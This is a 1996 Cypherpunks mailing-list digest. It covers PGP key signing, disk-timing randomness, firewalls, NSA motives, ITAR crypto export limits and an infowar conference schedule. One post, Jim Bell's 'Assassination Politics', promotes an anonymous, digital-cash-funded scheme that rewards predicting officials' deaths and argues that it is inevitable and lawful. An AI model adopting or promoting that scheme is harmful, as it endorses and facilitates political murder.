Message-ID: <Pine.SUN.3.91.960124134820.1233A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jan 1996, Jonathan Rochkind wrote:

> If, on the other hand, I sign "Toxic Avenger"'s key, then what benefit is
> this for third parties?  Since Toxic Avenger is, by intention, _not_ linked
> to a real person, I'm not saying that I feel confident that this key really
> belongs to any particular real person.  What am I saying?

"Toxic Avenger" may be known to a group of people (ie he may be a member 
of a terrorist cell). You're claiming that the key belongs to the 
"legitimate" TA...

Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald T. Davis" <don@cam.ov.com>
Date: Thu, 25 Jan 1996 04:35:56 +0800
To: cypherpunks@toad.com
Subject: disk randomness
Message-ID: <199601241850.NAA21039@gza-client1.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain



rich salz posted to this list a message i sent him
about a portable way to gather disk-noise for a true rng.

he also was kind enough to forward a reply to me from
the list, because i wasn't subscribed at the time. the
reply's author pointed out that my approach is not a 
practical one, and that NOISE.SYS gathers disk timings
and other noise more efficiently, anyway. now that i'm
subscribed, i'll answer on my own behalf:

i agree that my algorithm isn't practical. in fact,
that's why i agreed to rich's request that i let him
post my message here. i don't recommend paging-timings
to my clients, because it's not a workable approach
for production-quality code.

memory-paging's only virtue as a noise-source is that
it's uniquely portable. i failed to emphasize this,
in the message rich forwarded for me. the code needs
no device-specific calls, and the only OS-specific call
is the gettime() call. even with this virtue, i don't
recommend it as a production-quality algorithm, unless
the process that needs the rng is already memory-bound.
i'm sorry that my original msg was unclear on this point;
that's my fault, not rich's.

by the way, i think the "interesting work" of mine to
which rich referred, is my paper on disk randomness,
which appeared in the crypto '94 proceedings. it presents
work i did at mit from '88-9, and shows mathematically
why disk-timings can contain true entropy: a disk's speed
variations come from air turbulence, which now is known
mathematically to be unpredictable in the long run.
my coauthors were p.r. fenstermacher, a chaos-theory
physicist, and r. ihaka, a statistician.

				-don davis, boston




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven C. Perkins" <sperkins@andromeda.rutgers.edu>
Date: Thu, 25 Jan 1996 04:04:45 +0800
To: cypherpunks@toad.com
Subject: Rutgers symposium on Copyright and NII 14-15 Feb 96
Message-ID: <1.5.4b11.16.19960124185525.546f5062@andromeda.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Please forward as appropriate.  Conference Program will be at
"http://www.rutgers.edu/RUSLN/copyconf.html" this weekend.


Roundtable Conference:
Copyright Issues and the National Information Infrastructure
Rutgers School of Law - Newark
February 14-15, 1996

Rutgers School of Law - Newark is hosting an important conference
dealing with major issues presented by the White Paper and electronic
distribution of information products.  Three roundtable sessions will engage
40-50 leading scholars, lawyers, corporate counsel, and government officials
in a day-long discussion and debate of critical law and policy issues.  The
scheduling of this conference anticipates further policy debates and
congressional hearings on pending proposals.  It will join leading actors in
an in-depth exploration of core issues through an exchange that identifies
and addresses a diversity of interests and searches for greater mutual
understanding and expansion of areas of agreement.

Registration fee: $125  Registration deadline: February 10, 1996
(Walk-in registration permitted beginning at 8:30 AM.)

Rutgers School of Law - Newark
15 Washington Street
Newark, NJ  07102-3192
   Attn: Assistant Dean Margaret C. Bridge

For further information, call Assistant Dean Margaret C. Bridge at (201)
648-5094, or send email to Professor David A. Rice at drice@world.std.com.

-------------------------------------------------------------
**********||||||||||\\\\\\\\\\*//////////||||||||||**********
Steven C. Perkins              sperkins@andromeda.rutgers.edu
User Services Coordinator
Ackerson Law Library    http://www.rutgers.edu/lawschool.html
Rutgers, The State University of New Jersey,
School of Law at Newark 
                   http://www.rutgers.edu/RUSLN/rulnindx.html
              VOX: 201-648-5965 FAX: 201-648-1356                        
|||||||||||||||\\\\\\\\\\\\\||*||///////////////|||||||||||||||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Thu, 25 Jan 1996 05:02:14 +0800
To: cypherpunks@toad.com
Subject: Re: IPSEC == end of firewalls
Message-ID: <199601242003.OAA23388@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Discussing firewalls, ses@tipper.oit.unc.edu (Simon Spero) writes:

>What do you need as well as crypto before you can remove all firewalls?

What firewalls do is they allow an independent group of people to
track external network access and enforce rules over a large
population of hosts. Given that just about any security installed on a
workstation can be overcome (inadvertently or consciously) by someone
with physical access to it, I doubt firewalls will ever go away
entirely. Today's techniques will no doubt evolve and change in varous
ways over time. But I'd be surprised if the function went away
entirely.

Until Netscape came out I suspected that desktop crypto wouldn't make
the bigtime soon, simply because there are too many ways to do it
wrong. Netscape has demonstrated that doing it wrong is no impediment
to deployment.

Organizations that want to do crypto well are probably going to
concentrate crypto services in a few closely managed hosts to reduce
the risk of messing things up.

Rick.
smith@sctc.com         secure computing corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 25 Jan 1996 04:43:32 +0800
To: perry@piermont.com
Subject: Re: NSA says strong crypto to china??
Message-ID: <01I0E49IAYZGA0UM4U@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com"  9-JAN-1996 12:05:32.69

Alex Strasheim writes:
> If this is true, it's great news.  It would mean that the NSA is adopting
> both cypherpunk analysis and tactics.  Who would have thought?  An NSA 
> remade in Tim May's image.

I suspect that the NSA was thinking in our terms long before many of
us were aware of cryptography. I actually think that in many cases,
their behavior is perfectly rational. Their goals are merely
different. If you are in SIGINT, I believe that the possibility of
totally losing a valued intelligence tool must heavily weigh on your
mind. Of course, they are hardly monolithic, and different groups at
the NSA necessarily have different goals.

Once SIGINT becomes much harder regardless of their previous attempts
to stop it, I suspect that the NSA will become a friend and not an
impediment. By that time, of course, the "we have to protect our
people" types will be the only ones producing results and getting
funding, and the "we have to gather information" types will have long
ceased to produce. Thats probably a decade or more off, though.
---------------
	I suspect that the NSA can basically be divided into four groups:
	A. Those who are interested in protecting American individual
liberties, and are thus (possibly potential) allies. This bunch may have a
subgroup of those who already are allies, who have unfortunately been rather
unsuccessful (or perhaps we simply haven't seen their successes).
	B. Those who realize about the potentials for individual liberty from
cryptography, but believe that something else about America is more important.
For instance, they may believe that the voters in a democracy should be able to
institute whatever rules they like. Various left- and right-wing viewpoints
are also possible here; the former would include worrying about lost tax
dollars because of wanting big government, the latter would include concerns
about pornography, etcetera.
	C. Those who are in the NSA because they want power, and strong
cryptography's dissemination would hinder this. This group is likely to be
concealed as one of the other groups.
	D. Those who haven't thought about it, and are simply following orders.
I suspect that this is the largest group; while the overall level of intellect
at the NSA may be higher than in the average population, the intelligence
mindset of "need to know" may be keeping many people from realizing everything
the NSA is doing.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 25 Jan 1996 05:30:49 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <199601242049.OAA06143@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> The usual issue: That if a foreign-originated product even appears to be a
> standard (so far, none have been), and includes strong crypto, then the NSA
> and other agencies will simply change the rules. Thus, if extremely strong
> crypto from "Netscape-Zurich" starts to have a significant market presense
> in the U.S., then some law will be passed to restrict it.

But what would they restrict?  The use of strong crypto between two
domestic points, or strong crypto where one end is within the US and the
other without?  We already have the former -- wouldn't it be hard for them
to take it away?  Especially if the software already has a large installed
base, which is your premise?

I'm not denying that there are people in the NSA who would want to react 
that way, but I don't think they'd be able to pull it off.

It is true that the National Security establishment has a lot of power 
and influence here.  But there are other groups with power as well, and 
the security types don't have the ability to do whatever they want 
without regard to the opinions and interests of those other groups.

I think America's commercial interests will carry the day.

The NSA isn't capable of achieving its objective, which is to preserve
passive surveillance.  It doesn't matter what the rules are or what
Congress passes.  It's over.  There are a lot of smart people in the NSA,
and some of them have to know that.

Big companies like Netscape, Sun, Microsoft, and IBM/Lotus, on the other
hand, will almost certainly achieve their objectives if they win the
political fight.  They'll make buckets of money selling crypto software
abroad.  And if they lose the fight, they're going to be handing big
opportunities to foreign competitors. 

Who's going to fight harder?

You add to that the fact that impartial observers will say, for the most
part, that Netscape's right and the NSA is wrong, and the tremendous 
interest world wide in creating a trustworthy net based infrastructure 
for commerce, and the NSA starts to look a good poker player with a bad 
hand.

They used to say that "what's good for General Motors is good for the 
country."  A lot of people still feel that way about our biggest 
companies.  When they get their acts together and stare down the NSA in a 
block, it will all be over.

I feel a little strange about constantly playing the corporate shill here. 
I'm not a corporate person, and all of the companies I talk about here
would probably find me unsuitable for employment.  I'm certainly not going
to participate in the crypto profits that they'll realize.  My interest in
this isn't the same as Netscape's.  But it's going to be Netscape that
pushes this thing over the top. 

Crypto is a big tent issue.  Some people want the restrcitions eased so
they can make money, some are afraid of the government, some want to
protect civil liberties, some love the math and technology, and others 
just want to thumb their noses at Mr. Freeh.  

I want to see censorship become technically infeasible.  There's very
little popular support for that position among the general public; 
everyone wants censorship as long as they agree with the censor.  Arguing
for crypto from the vantage point of a civil libertarian is pointless. 
Even here on cypherpunks the bill of rights doesn't get much respect. 

The point is that the only guy in the big tent with any clout at all is
the corporate manager.  When the kids get together on the street and
protest net censorship, does anyone care?  Is a militia movement argument
going to play in Peoria?  (I think those are counter productive -- at
times I've been scared enough by them to re-examine my own position.)

I agree with Noam Chomsky when he says that corporate interests dominate
our politics, but I also agree with Milton Friedman when he says its for
the best. 

We should focus our efforts on energizing corporate America for the fight. 
The best way to do that is to demonstrating to customers that exportable
security is nothing more than snake oil under the current rules.  Another
way it is to explain to people -- journalists and managers alike --
exactly why the current rules are bad for business.  Lets develop and
popularize arguments against the NSA position, not radical or esoteric
arguments, but the kind of arguments that sensible people who go to work
and read the paper every day can repeat to one another when they talk
about politics. 

If we can get this stuff onto the editorial page of the WSJ -- which is 
where it belongs -- we'll be in spitting distance of a victory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 09:15:56 +0800
To: Robert Vincent <cypherpunks@toad.com
Subject: re: Assassination Politics
Message-ID: <m0tfElO-000901C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Notice that I've added two areas to the list above, 
nwlibertarians@teleport.com and dnowch2@teleport.com ; the areas on which 
"Assassination Politics" is commonly discussed.  I've also sent a copy to 
Cypherpunks@toad.com, for its obviously ob crypto (encryption, digital cash, 
etc) aspects.


At 10:09 AM 1/24/96 -0500, Robert Vincent wrote:
>So what's to keep the powers-that-be from successfully assassinating the 
>would-be directors of any such organization

Technically, "nothing."  Nothing unusual, anyway.  Except that if  you 
follow my logic carefully, you will see that I believe that the developments 
I describe are tantamount to being technologically "inevitable."  The mere 
existence of good encryption, Internet-type worldwide networking, and 
untraceable digital cash will "automatically" allow/cause such systems to
arise.  
And development of such an organization ANYWHERE, plus the Internet, means 
that it can operate EVERYWHERE.


Further, here is my speculation:  Let's assume I have this Internet soapbox, 
and I manage to convince you and your friends  (and their friends, etc) that:

1.  My system, if allowed to work, will replace the current political system 
with one that is far more "attractive," on the average.  In other words, it 
will do approximately what I claim it will:  Eliminate all governments, 
militaries, taxes, yet maintain a reasonable degree of freedom for all 
citizens, rich and poor, strong and weak, etc.  It'll even punish criminals.
Real criminals, like murderers, rapists, thieves, etc.

Furthermore, that it won't have any _likely_ "horror scenarios" associated 
with it (such as the ones some people (wrongly) think exist), or at least it 
will be no worse than the status quo.   In fact, it will be a VAST 
improvement over the status quo.  It will produce, I believe, an essentially 
perfectly libertarian (and _stably_ anarchistic, yet it has protections for 
rights.) society.

and

2.  The system is just about technologically inevitable, given the technical 
developments which already exist and I forsee.

and

3.  The only thing that's preventing such a system from being adopted is the 
fact that this system would eliminate the control of the current political 
system by those few who now control it.

Segue to near the end of the 1964 movie, Dr. Strangelove, where the title 
character (the scientific advisor to the President) is asked by the 
President whether enormous buried cobalt bombs can be 
built, and controlled by computer to detonate automatically on 
nuclear attack.  He said, "It requires only the _will_ to do it."


Similarly, I would argue that the implementation and rollout of an 
"Assassination Politics" scenario is almost even today within the technical 
capability in common usage, lacking only the common acceptance of "digital 
cash".  At some point, "it requires only the _will_ to do it."

At that point, I argue that we will have a scenario reminiscent of the day 
the East German citizens  broke down the Berlin Wall.  Enough people wanted 
it done, and nobody was going to stand up and try to stop it.  It HAPPENED.  
It was "illegal" by the standards of East Germany that day, but it HAPPENED.

The odd thing, however, is that despite my publicizing the idea of 
"Assassination Politics" to what by now has probably been thousands of 
people and (statistically) dozens of lawyers, I haven't heard a serious, 
defensible argument that the implementation of this system would even be 
ILLEGAL by black-letter US law.

True, any underlying killings might be, and probably would be, murder.  But 
the system as I described it is quite carefully structured to prevent anyone 
but the self-motivated murderer from doing the murder, knowing that it will 
occur in the future, or (for that matter) knowing for sure that it actually 
WAS a murder, or let alone who did it, even after it occurs.  While I won't 
claim I've "thought of everything," I _will_ say that I think I've 
demonstrated that current law would be vastly inadequate to deal with such a 
scenario.

I suspect that a lawyer familiar with the concept of "Assassination 
Politics" and who follows proposed legislation in Congress ought to scan for 
laws designed to preclude the development of such a system.  Whether or not 
this could even be accomplished is in serious question, since it would 
probably require banning all remnants of freedom in this country.  In other 
words, we are coming to a fork in the road:  One choice leads to perfect 
freedom, the other to absolute tyranny.  Well, at least you have been warned.


> and squelching any public mention of it? 

Well, YOU heard about it, didn't you, and I'm not dead.  (yet?)  True, the 
system doesn't actually exist and operate, but that's merely a matter of 
implementation, not of technical capability.  Microsoft could write the 
whole thing into Windows 97 as a "Killer App."   (This joke was to somebody 
else's credit, sigh!  Can't recollect who... Maybe Tim May?)


(I now believe that the US government's decision to develop the Internet was 
a case of slow-motion governmental suicide.  The trigger was pulled in the 
1960's, and the death will occur about 40 years later. "Jim Bell" (myself) 
will be one of the first to notice the "bullet" flying towards its mark.  
For making that observation, I will be severely criticized, and probably 
even BLAMED.)

In a sense, it is arguable that I am worthy of neither the credit nor the blame.
  

>Don't forget that the real controllers have the press and 
>the media in their pocket, not just your Congressman!  I predict that if 
>anybody actually does set up an organization to reward "predictors", that 
>person or person will be quickly and quietly put out of business, whether 
>by legal means or otherwise.

Follow the technological development of "nyms" on Cypherpunks.  It is 
possible that this system could be set up, totally anonymously, and perhaps 
even in a totally decentralized way, so that (for example) 1000 anonymous 
individuals (anonymous even from each other) run it according to agreed-upon 
rules.


>Which is too bad.  It's a beautiful idea, otherwise.

Hey!  Glad you think so!  One guy called it "atrocious."  Some people would 
have you believe that I'm a raving lunatic.  (Well, technically I can't 
prove to you I'm NOT a "raving lunatic," but at least to you, believing in this 
system isn't evidence to the contrary.)

Another guy said that if this system were ever implemented, I would have 
become "the Antichrist."  Even though I'm an atheist myself, I know enough 
about religion in general, and Christianity in particular, to realize that 
statement wasn't intended as a complement.


Jim Bell

Klaatu Burada Nikto.    Remember this.   It'll become important...soon.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQbBYPqHVDBboB2dAQHBIgQAlK69QFvjS4QaG+RVYHPZ13FqhqxHezqS
hpQqXQDunqRmfP4nYLaYcy2xOowHEEl+4w+H/6SP70vs+gMgi9ouW0kEGbHQSljF
OvOYRSq+xg1MRvDN6ZLCGYBODs7K0iM5bv6X8c7zzja1RH3WGEIYfp+ZzQXT7LV7
6PKHVslWKFk=
=guZo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Thu, 25 Jan 1996 05:28:15 +0800
To: John_McMickle@judiciary.senate.gov
Subject: InfoWarCon Europe 1996 Updated Schedule
Message-ID: <199601242051.PAA01047@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Revised Short Draft DOI: 18 Jan 96  ----------
P L E A S E  D I S T R I B U T E  W I D E L Y 

             InfoWarCon (Europe) '96
        Defining the European Perspective
               Brussels, Belgium
                 May 23-24 1996 

Sponsored by:

  National Computer Security Association
  Winn Schwartau, President and CEO, Interpact, Inc.
  Robert David Steele, Chairman & CEO, Open Source Solutions Group 

May 22, 1996

17:00 - 20:00	Pre-Registration					
18:00 - 21:00	Hosted Cocktail Party with Music
		Most conference speakers will be in attendance.  Meet
		Mr. Schwartau and Mr. Steele. 

May 23, 1995

07:00 - 08:30	Registration						
07:00 - 08:30	Sponsored Continental Breakfast				

PLENARY SESSIONS

08:30 - 09:00	Keynote Speech						
		Major General William Robbins
			Director General of Information and
			Communications Services
			Ministry of Defence, United Kingdom (Invited) 
09:00 - 10:00	"Information Warfare: Chaos on the Electronic Superhighway"	
		Winn Schwartau, President and CEO, Interpact, Inc., USA
10:00 - 11:15	East Versus West: Military Views of Information Warfare		
	
		Moderator:	Robert Steele
		East: 	General Nikolai Ivanovich Turko,
			Information Warfare Expert
			Russia (invited)
		West: Captain Patrick Tyrell
			Assistant Director, Information Warfare Policy, 
			Ministry of Defence, United Kingdom
11:15 - 11:45	Sponsored Break						
11:45 - 13:00	Law Enforcement in Cyberspace: Cooperation is the Key
		Moderator: Winn Schwartau
		Miguel Chyamorro, (invited)
			Executive Assistant Director, Interpol
		Sweden
		Netherlands--Rotterdam Police (invited)
13:00 - 14:30	Lunch 							
13:30 - 14:00	Special Luncheon Presentation
BREAKOUT SESSIONS
14:30 - 16:00
Breakout I:	Threats to European Civil Prosperity
		Moderator: Winn Schwartau:)
			Private Businesses
			Germany, France, UK
Breakout II:	Information Warfare: Support for Conventional War Fighting
		Moderator: SHAPE - NATO (invited)
		Panel:  US - Gen. Jim McCarthy USAF (Ret)
			Russia: Admiral Vladimir Semenovich Pirumov (Ret)
			Chairman of Scientific Counsel of the
			Russian Security Counsel (invited)
			Sweden - (Invited)
16:00-16:30	Sponsored Break						
PLENARY SESSION
16:30 - 18:00	"Hackers: National Resources or Merely Cyber-Criminals?"
		Co-Moderators:
			Mich Kabay, Ph.D., Director of Education, NCSA and 
			Robert Steele, President, OSS, Inc.
		Panel:
			Rop Gonggrijp - Hactic and The Digital City 
				Amsterdam, Netherlands 
			Chris Goggans, co-founder Leagion of Doom, US
			CHAOS Computer Club, Germany (invited)
			"Frantic" Convicted French Hacker (invited)
18:00 - 21:00	Hosted Reception					
21:00 - 23:00	"Dutch Dinners" for Birds of a Feather			
			Rallying points will be provided.

May 24, 1996

07:00 - 8:30	Sponsored Continental Breakfast 
08:30 - 9:00	Keynote Speech
		"Efforts to Maximize Information As New Age Weapon"
			General Pichot-Duclos, France
PLENARY SESSIONS
9:00 - 10:00	"Creating Smart Nations Through National Information 
		Strategies: Intelligence And Security Issues"	
			Robert David Steele, President, OSS, Inc. US
10:00 - 11:15 	"The Convergence of Military and Commercial 
Vulnerabilities" 	
		Moderator:
			Winn Schwartau
		Panel:
			Bob Ayers, DISA, Department of Defense, US
			Dr. Leroy Pearce, Sr. Tech. Advisor, representing
			MajGen Leech, Asst. Dep. Minister, Defence 
			Information Services, Canada
			Holland / Belgium
			Captain. Pat Tyrell, Ministry of Defence, UK
11:15 - 11:45	Sponsored Break						
11:45 - 13:00	Societal Impact of Information Warfare 			
		Moderator:  Winn Schwartau,
		Panel:
			The Croatian View: Pedrag Pale, Chairman
				InfoTech Coordinating Committee, Ministry of
				Science, Technology, and Informatics.
			General James McCarthy (ret) US
13:00 - 14:30	Lunch 							
13:30-14:00	Special Luncheon Presentation 
BREAKOUT SESSIONS
14:30 - 16:00
Breakout I:	Legislation & Personal Privacy: 
		A Global Electronic Bill of Rights?
		Moderator: Dr. Mich Kabay, NCSA 
		Simon Davies, Electronic Privacy International, UK
		
Breakout II:	"Industrial Espionage: An Update"
		Moderator: Winn Schwartau
			Phillipe Parant, Diecteur, DST, France (invited) 
			Miguel Chamorro, Exec. Director, Interpol (invited)
			Kroll Associates US 
16:00 - 16:30	Sponsored Break						
PLENARY
16:30 - 18:00	Defining War in the Information Age
			"The New National Security"
		Brief comments by Winn Schwartau and Robert Steele - 
		and then a lively interactive audience debate.
18:00 - 18:10 	Closing Comments
18:00 - 20:00	No-Host Reception					

To obtain the latest edition of this program, send EMail to:

	euroinfowar@ncsa.com

For more information about NCSA:

	WWW:	http://www.ncsa.com
	CompuServe:	GO NCSA
	EMail:		info@ncsa.com

Sponsorships for various InfoWarCon (Europe) 96 events are still available. 
To find out how to sponsor portions:

	Contact Paul Gates at the NCSA: pgates@ncsa.com

To reach: 	Winn Schwartau:  Winn@Infowar.Com
		Robert Steele: ceo@oss.net

V 1.3/1.18.96-Short


Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Weinstein" <djw@vplus.com>
Date: Thu, 25 Jan 1996 09:15:32 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Crippled Notes export encryption
Message-ID: <199601242348.PAA03565@ns1.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

m5@dev.tivoli.com (Mike McNally) Wrote:
 
> Dan Weinstein writes:
>  > >By the way, I really think Netscape should simply ship Jeff and other
>  > >people to the Amsterdam office...
>  > 
>  > Wrong, this would be a violation of ITAR.
> 
> I don't understand; are you saying Jeff's brain is a munition under
> the ITAR?
> 
> (Is it a citizenship thing?  If so, that's an easily solved problem:
> hire Dutch (or Egyptian or Bangali or whatever) engineers.)

I forget how it is termed in ITAR, but expertise can't be exported 
either.  Another thing to remember is that Jeff and the others at 
Netscape aren't writing the encryption algorithms themselves, they 
implement the code that they get from RSA.  Though most of the 
code they get from RSA is already available abroad, if they wanted to 
import it they would face serious copywrite problems with RSA.  Also, 
like I suggested before any programers who gained their knowledge of 
crypto programing in the U.S. and then went abroad and developed 
crypto software would be in danger of prosecution under ITAR if they 
ever returned to the U.S..

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQbINb6vSB2TMALlAQG8zAf9FFlCiiYS86Q/ZsiycSXN0w7hT+NdVHI5
8fBVaT+w+OP5DZAbEMg7gM37ryujuDXnRO12WJTa8HTT5+W81TDf6vzgK2yWqShZ
kCM6j48nUttwYsXVGUpK2uSSBhLs1+y7lLPObs0I9BNZ9QZ3o/68jpRXnsph3+Oc
J4XEe6Yf1u/V4wM58hO8v1fClcCHSyeIFZL+i8NdhcO+BO71qBhOntsGWuVu+sM0
jN7/hix1do+xA856EkRzPoqv0LPcJkCjF3qw+iCKdI7y6LWljA91LJvrYedONu9V
cigMrsQF4QFJ2CHrxulolzMPuz4ZNg9K/ZjWoY2t8wgs57dDiojKTQ==
=ehWV
-----END PGP SIGNATURE-----

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 25 Jan 1996 06:11:47 +0800
To: Cypherpunks <shamrock@netcom.com (Lucky Green)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <v02120d67ad2c263c30f9@[192.0.2.1]>
Message-ID: <m0tfCQA-0004KjC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

: At 4:17 1/24/96, Timothy C. May wrote:
: 
: >The usual issue: That if a foreign-originated product even appears to be a
: >standard (so far, none have been), and includes strong crypto, then the NSA
: >and other agencies will simply change the rules. Thus, if extremely strong
: >crypto from "Netscape-Zurich" starts to have a significant market presense
: >in the U.S., then some law will be passed to restrict it.
: 
: I agree. The reason for enforcing ITAR is to keep good crypto of the
: *domestic* market. If ITAR no longer accomplishes that, new laws will be
: passed.

That is not so clear.  The ITAR are regulations, not a law passed by
Congress.  The ITAR regulations relating to the export of cryptography
are probably not authorized by any law (as well as being
unconstitutional).  The reason for all the silly twists and turns
under the ITAR is that the censors never succeeded in getting any law
forbidding the use of cryptography, and it is not at all certain that
they could get such a law passed.

There is very little that can be done under the ITAR to keep
Netscape-Zurich from spreading and it is Congress, not the Office of
Defense Trade Controls or the NSA that passes laws.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Thu, 25 Jan 1996 06:50:16 +0800
To: "'Joe Block'" <stewarts@ix.netcom.com>
Subject: RE: Crippled Notes export encryption
Message-ID: <01BAEA7E.07613560@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Joe Block wrote:
>
>At 11:50 PM 1/23/96, you wrote:
>>The problem is whether you can separate the functionality of what you're
>>exporting sufficiently from what you're contracting out that the exported
>>material isn't a "component of a cryptosystem"; it's tough to do a good bones
>>version of code if you're concerned about satisfying both the letter and
>>spirit of a law to avoid hassles with the government.  On the other hand,
>>if you're as big as IBM or even MIT, sometimes you can do it....
>
>So move 100% of the development overseas.  Pick someplace where the labor
>is cheaper (maybe the former Soviet Union, but I don't know what their
>crypto export laws are like) and develop 100% of the product overseas.  Put
[deletia...]

I've heard that India is the place to be for software
development these days (top talent for 10% the price of
Americans, or some such).  I've also heard that, for
example, CyberCash has a development office there.

-Pete Loshin
pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jan 1996 08:09:59 +0800
To: cypherpunks@toad.com
Subject: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <ad2bf34e04021004d2fa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:49 PM 1/24/96, Alex Strasheim wrote:

(quoting me)

>> The usual issue: That if a foreign-originated product even appears to be a
>> standard (so far, none have been), and includes strong crypto, then the NSA
>> and other agencies will simply change the rules. Thus, if extremely strong
>> crypto from "Netscape-Zurich" starts to have a significant market presense
>> in the U.S., then some law will be passed to restrict it.
>
>But what would they restrict?  The use of strong crypto between two
>domestic points, or strong crypto where one end is within the US and the
>other without?  We already have the former -- wouldn't it be hard for them
>to take it away?  Especially if the software already has a large installed
>base, which is your premise?

Specifically, I believe--though obviously cannot prove, given the nature of
time--that a cryptographically strong version of Netscape developed outside
the borders of the U.S. would not be freely importable into the U.S. I
don't know what form such a law would take, to answer the point raised in
another post by Peter Junger. Nor am I saying either State or NSA passes
the laws...the ITARs have worked largely because they have never been
challenged; if they were to be successfully challenged and stricken, as
even some folks inside the NSA think is likely if tested in a proper case,
then a Four Horseman-scared Congress will likely step in with some
restrictions.


>I'm not denying that there are people in the NSA who would want to react
>that way, but I don't think they'd be able to pull it off.
>
>It is true that the National Security establishment has a lot of power
>and influence here.  But there are other groups with power as well, and
>the security types don't have the ability to do whatever they want
>without regard to the opinions and interests of those other groups.

And now here's where I will speculate openly, although my speculation is
informed by having followed these debates (and even contributing to them)
for many years.

You have to ask yourself this question: "Why are there no cryptographically
strong products--finished products, not specific ciphers or chunks of
code--developed in Europe and freely imported into the U.S.?"

More specifically, given that the situation with crypto exports being
limited (the so-called $60 billion a year problem...even if inflated, still
a lot of money) has been known about for a long time, and given that
Europe, and to a lesser extent Japan, India, etc., has a strong software
infrastructure, you have to ask why "Netscape-Zurich" is not now being
imported into the U.S., as a core module that then (for example) the
American developers could add additional stuff to. Or why Lotus Notes-Tel
Aviv is not being imported, with at least an 80-bit work factor.

Or why Digicash is not taking the relatively trivial step of offering
extremely strong ciphers (maybe something like Haval?) and blitzing the
U.S. market? ("Only Digicash is offering _all_ of our customers the same
level of communications security.")

(I'll get to some of the practical issues, that the culture of Europe is
not quite as conducive as the culture of the U.S. to startups, such as
Netscape, Spry, Intuit, etc., but I don't think this gets at the main point
of why strong crypt is not being _imported_ into the U.S.)

If the business losses are anything really close to $60 billion a year,
then companies wishing to have strong crypto should be *screaming* for
Europe-developed products to be brought back in to the U.S.

There are of course two components to the alleged $60 B a year losses,
broadly speaking:

* the losses of companies not in the crypt tools business who are losing
out because the crypto they are allowed to export weakens their product's
attractiveness.

* the losses of crypto tool makers who are losing out because their
products are not attractive to non-U.S. buyers

(Does anyone else out there see a disconnect in the logic here? If Company
A is losing business to a non-U.S. Company B, then why is whatever Company
B is providing (such as stronger crypto) not being imported into the U.S.
For example, if Netscape is losing out to "CERNScape," the hypothetical
browser company out of the CERN WWW groups, then why is CERNScape not
selling here? In fact, where _are_ the products that are winning out over
the crippled American products?)

(Understand that I'm not claiming there are no losses, that the $60 B a
year figure is not accurate (though I think it inflated a bit), I'm just
trying to figure out what's really going on here.)

Let's review some points that may be relevant to why "offshore development"
has not become a reality, even though one might think it would (given the
$60 B figure...that pays for an awful lot of overseas programmers!).

First, the "crypto hooks" point we discuss so often. Merely having hooks
that link to offshore crypto is a problem, as the ITARs make clear. Thus,
Lotus cannot simply say to its non-U.S. customers, "We are shipping a
version overseas that contains only 40-bit crypto; you are advised to
download 80-bit crypto from http://defeat-itars.lotus-geneva...." I don't
know precisely how the NSA and State would react, and what law would be
cited (beyond a reading of the ITARs), but pretty clearly this would not
fly in the current climate. Lotus might get visits from the NSA, might be
